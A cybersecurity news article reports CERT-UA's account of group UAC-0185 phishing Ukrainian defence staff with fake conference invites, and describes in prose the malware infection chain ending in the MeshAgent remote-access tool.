Login
iscover
Share this article on:
Powered by
MOMENTUM
MEDIA
Powered by MOMENTUMMEDIA
Ukraine has said that Russian state-linked threat actors have been targeting its defence contractors.
Ukraine’s Computer Emergency Response Team (CERT-UA) released a report saying that a group called UAC-0185 had been sending emails containing malicious links to employees of Ukrainian defence contractors and the defence force.
According to CERT-UA, the threat group posed as the Ukrainian Union of Industrialists and Entrepreneurs, claiming to be inviting the staff to a real conference discussing the transition of Ukrainian defence products to NATO standards that was held on 5 November.
The emails then contained a link, which the threat actors claimed granted access to information regarding the invite, but it instead would download a file called “list_02-1-437.lnk”.
“Opening the LNK file will download and launch the ‘start.hta’ file using the standard mshta.exe utility,” said CERT-UA.
“The mentioned HTA file contains JavaScript code designed to launch two PowerShell commands, one of which will download and open a bait file in the form of a USPP letter, and the second – download the ‘Front.png’ file, which is a ZIP archive containing three files: ‘Main.bat’, ‘Registry.hta’ and ‘update.exe’, extract the contents of the archive to the ‘%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\’ directory and launch the ‘Main.bat’ BAT file.
“The latter will move the ‘Registry.hta’ file to the autorun directory, execute it, and delete some of the downloaded files from the computer.
“Finally, ‘Registry.hta’ will launch ‘update.exe’, which is classified as a remote control program MESHAGENT.”
The malware within the files used was reportedly used in cyber attacks since early 2023.
While Ukraine did not name Russia as being behind the attacks, UAC-0185, also known as UNC4221, was connected to the Russian government by SentinelOne earlier this year.
The group has been active since at least 2022, according to CERT-UA, and focuses on stealing credentials for Signal, Telegram, WhatsApp and a number of military systems such as DELTA, TENETA and Kropyva.
“At the same time, cyber attacks are carried out to a more limited extent, aimed at obtaining unauthorised remote access to computers of employees of the defence-industrial complex enterprises, as well as the Defense Forces of Ukraine using specialised software tools, in particular, MESHAGENT and ULTRAVNC,” said CERT-UA.
Be the first to hear the latest developments in the cyber industry.
